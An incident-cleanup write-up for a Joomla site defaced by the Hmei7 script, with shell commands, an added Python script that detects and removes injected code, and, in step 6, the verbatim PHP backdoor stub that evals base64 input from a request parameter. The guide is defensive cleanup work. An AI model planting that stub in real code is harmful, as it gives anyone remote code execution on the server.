
Hmei7-cleanup

Background:

I had to clean up after an HMEI7 script attack on a Joomla site this morning and figured I should share my efforts. The site owner did not have a recent backup, so the decision was made to clean up the existing site.

The HMEI7 script is rather crude in its approach. It modified the index.php page and replaced it with a Base64-encoded version containing another Base64-encoded redirect to some external site. A good number of .PHP scripts were modified with additional lines of code that would prevent the site from working even after the index page was restored. I wrote a small script that tracked down the modified pages and removed the unwanted code.

Clean up:

  1. Backed up the existing files.

    tar cjf cms.tar.bz2 cms/
    
  2. Identify the time of the attack. The script drops its signature into x.txt in the root folder. The file contains "hacked by Hmei7". Noted the modification time of the file.

  3. Find all files that were modified since that time. In my case, 2 days.

    find . -mtime -2 >modified_files.txt
    

    Copied that file via FTP to my laptop for later reference.

  4. The attack script added a number of new files. Removed them all:

    find . -name "index.old.php" -exec rm -f {} \;
    find . -name "index.1.php" -exec rm -f {} \;
    find . -name "class.back.php" -exec rm -f {} \;
    
  5. Cleared out the tmp folders

  6. Analyzed the modified files and found a pattern. The modified PHP files contained the following additional code, either on one line or on three.

    <?PHP defined('_OLD_JEXEC_') or die(@eval(base64_decode($_REQUEST['comment']))); ?>
    
    <?PHP
     defined('_OLD_JEXEC_') or die(@eval(base64_decode($_REQUEST['comment'])));
    ?><?php...
    

    I wrote and ran the cleanup.py script to deal with those. The script creates backup copies of every file it modifies by adding the extension .bad to the file name. Once the site is restored these can be deleted with

    find . -name "*.bad" -exec rm -f {} \;
    
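The cleanup.py mentioned above is not included in this page, so here is an added example of a script that does the same job: it walks a directory, detects the injected `defined('_OLD_JEXEC_') or die(@eval(...))` stub in both its one-line and three-line forms, keeps the original as `<file>.bad`, and writes the file back without the stub. This is my own example, not the author's script; the regex and the `.bad` naming are assumptions based on the text above.

```python
# Added example (not the author's cleanup.py): strip the HMEI7 backdoor stub
# shown above from PHP files, keeping a copy of each original as <name>.bad.
import os
import re

# Matches both forms quoted above: "<?PHP" in any case, with optional
# whitespace/newlines around the defined(...) call and before the closing "?>".
HMEI7_STUB = re.compile(
    r"<\?php\s*defined\('_OLD_JEXEC_'\)\s*or\s*die\(@eval\(base64_decode\("
    r"\$_REQUEST\['comment'\]\)\)\);\s*\?>",
    re.IGNORECASE,
)


def is_infected(source: str) -> bool:
    """True if the file text contains the injected stub."""
    return HMEI7_STUB.search(source) is not None


def strip_stub(source: str) -> str:
    """Remove every occurrence of the stub; the rest of the file is untouched."""
    return HMEI7_STUB.sub("", source)


def clean_tree(root: str) -> list[str]:
    """Clean every infected .php file under root; return the paths changed.
    Each original is renamed to <path>.bad before the cleaned copy is written,
    so nothing is lost if the regex ever removes too much."""
    changed = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "r", encoding="utf-8", errors="surrogateescape") as fh:
                source = fh.read()
            if not is_infected(source):
                continue
            os.replace(path, path + ".bad")  # backup first, then write cleaned copy
            with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                fh.write(strip_stub(source))
            changed.append(path)
    return changed


if __name__ == "__main__":
    import sys
    for p in clean_tree(sys.argv[1] if len(sys.argv) > 1 else "."):
        print("cleaned", p)
```

Run it against the backed-up copy first and diff a few `.php`/`.php.bad` pairs before trusting it on the live tree.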
  7. Checked the .htaccess files

  8. Checked the configuration.php file

  9. Removed the x.txt file under root

  10. Copied the index.php back from backup and, et voilà, the site was up again.

  11. Ran a few quick grep tests to make sure I did not miss any files.
